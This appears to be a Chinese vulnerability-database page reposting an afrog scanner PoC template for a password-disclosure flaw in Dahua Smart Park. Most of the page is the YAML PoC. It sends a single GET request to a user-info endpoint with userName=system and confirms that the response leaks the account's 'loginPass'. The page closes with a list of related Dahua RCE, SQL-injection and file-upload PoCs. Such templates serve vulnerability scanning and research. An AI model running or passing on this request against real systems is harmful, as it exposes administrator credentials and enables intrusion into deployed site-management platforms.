dahua-zhyq-password-disclosure: 大华智慧园区任意密码读取攻击

日期: 2025-09-01 | 影响软件: 大华智慧园区 | POC: 已公开

漏洞描述

后台登录页面：http://xx.x.x.x/admin/login_login.action

PoC代码[已公开]

id: dahua-zhyq-password-disclosure

info:
  name: 大华智慧园区任意密码读取攻击
  author: zan8in
  severity: high
  verified: true
  description: |
    后台登录页面：http://xx.x.x.x/admin/login_login.action
  tags: dahua,disclosure
  created: 2023/08/22

rules:
  r0:
    request:
      method: GET
      path: /admin/user_getUserInfoByUserName.action?userName=system
    expression: response.status == 200 && response.body.bcontains(b'"loginName":"system"') && response.body.bcontains(b'"loginPass":')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-zhyq-password-disclosure.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

dahua-smart-park-deleteftp-rce: 大华智慧园区综合管理平台 deleteFtp 远程命令执行 POC

dahua-smartpark-sql-inject: 大华智慧园区综合管理平台SQL注入 POC

dahua-zhyq-pio-fileupload: 大华智慧园区 前台 poi 文件上传 POC

dahua-ipms-rce: 大华智慧园区综合管理平台 ipms 远程代码执行漏洞 POC

dahua-smart-downloadbyurlatt-fileread: 大华智慧园区管理平台任意文件读取 POC

dahua-zhyq-pio-fileupload: 大华智慧园区前台 poi 文件上传 POC